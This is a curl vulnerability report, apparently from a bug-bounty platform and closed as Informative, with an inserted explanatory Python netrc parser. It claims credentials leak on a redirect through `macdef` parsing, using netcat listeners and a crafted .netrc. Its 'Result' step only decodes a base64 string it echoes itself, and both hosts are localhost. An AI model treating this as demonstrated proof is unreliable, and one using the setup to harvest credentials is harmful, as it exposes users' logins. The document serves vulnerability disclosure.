Credential leak on redirect due to improper state clearing when parsing macdef in netrc.c
Low
C
curl
Reported by oxghostly
Vulnerability Details
Technical details and impact analysis
## Summary
When parsing a .netrc file, the macdef keyword fails to clear previously loaded credentials. If a redirect follows, these credentials are leaked to the new host. This is a new variant of CVE-2024-11053, triggered by a different code path (`macdef` instead of `default`).
No, this vulnerability was discovered through manual code analysis and testing.
## Affected version
```
curl 8.15.0-DEV (x86_64-pc-linux-gnu) libcurl/8.15.0-DEV OpenSSL/3.5.0 zlib/1.3.1 libpsl/0.21.2
Release-Date: [unreleased]
Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns mqtt pop3 pop3s rtsp smb smbs smtp smtps telnet tftp ws wss
Features: alt-svc AsynchDNS Debug HSTS HTTPS-proxy IPv6 Largefile libz NTLM PSL SSL threadsafe TLS-SRP TrackMemory UnixSockets
```
## Steps To Reproduce
Set up two listeners:
1- `nc -l -p 9000`
2- `echo -e "HTTP/1.1 301 Moved Permanently\nLocation: http://localhost:9000" | nc -l -p 8000 -q 1`
3- Create a file `poc_netrc.txt` with the following content:
```
machine localhost
login admin
password SuperSecretPassword123
macdef foobar
echo "malicious macro"
default
login not_admin
```
4- Execute curl to trigger the leak:
`./src/curl -L --netrc-file poc_netrc.txt http://localhost:8000`
5- `echo YWRtaW46U3VwZXJTZWNyZXRQYXNzd29yZDEyMw== > temp_output.txt`
6- `base64 -d < temp_output.txt`
Result: `admin:SuperSecretPassword123`
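The example below is added here to make the parsing question concrete; it is not curl's netrc code and not part of the report. It is a hand-written minimal .netrc parser that applies the classic rule for `macdef` (a macro body runs from the line after `macdef NAME` up to the next blank line, or end of file, and its lines are stored as text rather than interpreted as netrc tokens), together with a lookup that resolves credentials independently for every host in a redirect chain instead of carrying the first host's credentials forward. The file content is the report's `poc_netrc.txt`, embedded as a constructed string; the second variant, with a blank line terminating the macro, is constructed to show the contrast. Function and class names (`parse_netrc`, `credentials_for`, `credentials_per_hop`, `Entry`) are this example's own.

```python
# Added example: minimal .netrc parser with classic macdef handling and
# per-host credential resolution. Not curl's code; names are this example's own.
from dataclasses import dataclass
from typing import Optional


@dataclass
class Entry:
    machine: str                      # hostname, or the literal "default"
    login: Optional[str] = None
    password: Optional[str] = None


def parse_netrc(text):
    """Return (entries, macros) for the given .netrc text.

    'machine NAME' and 'default' open a new entry; 'login' and 'password'
    set fields on the current entry. 'macdef NAME' opens a macro whose body
    is every following line up to the next blank line (or end of file); the
    body is stored verbatim and never interpreted as netrc tokens, so a
    'default' or 'login' line inside it does not create or alter an entry.
    """
    entries = []
    macros = {}
    lines = text.splitlines()
    current = None
    i = 0
    while i < len(lines):
        tokens = lines[i].split()
        i += 1
        j = 0
        while j < len(tokens):
            tok = tokens[j]
            if tok == "machine" and j + 1 < len(tokens):
                current = Entry(machine=tokens[j + 1])
                entries.append(current)
                j += 2
            elif tok == "default":
                current = Entry(machine="default")
                entries.append(current)
                j += 1
            elif tok == "macdef":
                name = tokens[j + 1] if j + 1 < len(tokens) else ""
                body = []
                # Consume the macro body up to the next blank line / EOF.
                while i < len(lines) and lines[i].strip() != "":
                    body.append(lines[i])
                    i += 1
                macros[name] = body
                break  # anything after the macro name on this line is ignored
            elif tok in ("login", "password") and current is not None and j + 1 < len(tokens):
                setattr(current, tok, tokens[j + 1])
                j += 2
            else:
                j += 1
    return entries, macros


def credentials_for(entries, host):
    """Exact 'machine' match wins; otherwise the 'default' entry; otherwise None."""
    for e in entries:
        if e.machine == host:
            return e.login, e.password
    for e in entries:
        if e.machine == "default":
            return e.login, e.password
    return None


def credentials_per_hop(entries, hosts):
    """Resolve credentials afresh for each host of a redirect chain, so the
    first host's login/password are never reused for a later hop."""
    return {h: credentials_for(entries, h) for h in hosts}


# Constructed input: the report's poc_netrc.txt (no blank line after the macro).
POC_NETRC = """machine localhost
login admin
password SuperSecretPassword123
macdef foobar
echo "malicious macro"
default
login not_admin
"""

# Constructed variant: a blank line terminates the macro, so 'default' is a real entry.
POC_NETRC_TERMINATED = POC_NETRC.replace('echo "malicious macro"\n', 'echo "malicious macro"\n\n')

if __name__ == "__main__":
    for label, text in (("unterminated macro", POC_NETRC), ("terminated macro", POC_NETRC_TERMINATED)):
        entries, macros = parse_netrc(text)
        print(label, "entries:", [e.machine for e in entries], "macro lines:", len(macros["foobar"]))
        print("  per hop:", credentials_per_hop(entries, ["localhost", "other.example"]))
```

With the report's file, the parser yields a single `localhost` entry, and `default` / `login not_admin` land inside the `foobar` macro body; only when a blank line closes the macro does a `default` entry exist. Because both listeners in the report run on `localhost`, a hostname-keyed lookup returns the same entry for both hops of that redirect, which is why the example also resolves a constructed second hostname (`other.example`) to show the non-matching case.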
## Supporting Material/References
The output on the (Attacker Server) terminal (the one listening on port 9000) will show the leaked `Authorization` header containing the credentials for `localhost`. This proves that the credentials persisted across the redirect.
## Impact
If an attacker controls the redirect, they can trick curl into sending the victim’s .netrc username and password to the wrong server.
This can happen without the user noticing, especially in scripts or CI pipelines where curl runs automatically using .netrc for login.
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2024-11053
UNKNOWN
When asked to both use a `.netrc` file for credentials and to follow HTTP redirects, curl could leak the password used for the first host to the followed-to host under certain circumstances. This flaw only manifests itself if the netrc file has an entry that matches the redirect target hostname …
Report Details
Additional information and metadata
State: Closed
Substate: Informative
Weakness: Information Exposure Through Sent Data